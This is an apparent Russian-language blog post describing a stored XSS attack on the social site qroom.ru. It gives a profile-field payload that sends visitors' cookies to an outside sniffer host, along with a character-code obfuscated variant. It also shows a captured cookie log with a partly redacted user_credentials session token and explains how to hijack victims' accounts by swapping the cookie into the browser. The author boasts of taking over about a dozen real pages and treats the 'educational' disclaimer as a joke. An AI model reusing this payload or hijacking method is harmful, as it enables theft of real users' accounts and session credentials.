XSS-уязвимости, для справки - Межсайтовый скриптинг

img = new Image(); imgsrc = "//sniffer.xaknet.ru/smiles/xxxxxxx.gif?"+document.cookie;

Это все вставляется в поле "Расскажите о себе". Также есть еще другой вариант, кодирование посимвольно.

Пример:

lcation=StringfromCharCode(104, 116, 116, 112, 58, 47, 47, 104, 101, 108, 46, 104, 49, 54, 46, 114, 117, 47, 49, 46, 106, 112, 103);

Сохраняем это в профиле.

Вообщем после захода на мою страницу, сookie улетают на снифер и прилетают в таком виде:

IP: 82.209.72.XX

HOST: pool-XX-30.ptcomm.ru

REFERER: http://qroom.ru/xxxxxxxxx

QUERYSTRING:

user_credentials=XXX74220323efec4fa98582bd0f63ce44f64d7eefd0934e4f224310b3d49d3101d0dbc5dd547f38a87b36d2e2327448b764ebd638f1cb7d6f06d624ffbb09%3A%3A89800;%20news_last_checked_at=2012-02-06+15%3A01%3A50+%2B0400;%20blog_posts_last_checked_at=2012-02-06+15%3A14%3A20+%2B0400;%20__utma=257901899.121135492.1327951535.1328526016.1328536708.33;%20__utmb=257901899.45.10.1328536708;%20__utmc=257901899;%20__utmz=257901899.1328536708.33.33.utmcsr=vk.com|utmccn=(referral)|utmcmd=referral|utmcct=/rina_XXX

Нас больше всего из этого интересует вот эта вещь user_credentials, как раз-таки там храниться шифрованная информация о пароле и логине.

А дальше все очень просто, в редакторе cookie на своем браузере выдираем полученную строчку и вставляем вместо своей. Перезагружаем страницу, вот и все вы на странице вашей жертвы, делайте что хотите. Найдя все это, я написал в саппорт, но ответа так и не услышал, но после взлома с десяток страниц, её закрыли где-то через месяц. Такие действия конечно пахнут статьей, ну да ладно, главное что они все-таки исправили.

Данная статья написана исключительно в познавательных целях, такие дела преследуются по закону РФ. Автор этой статьи врет и ничего такого не делал.

На этом все :)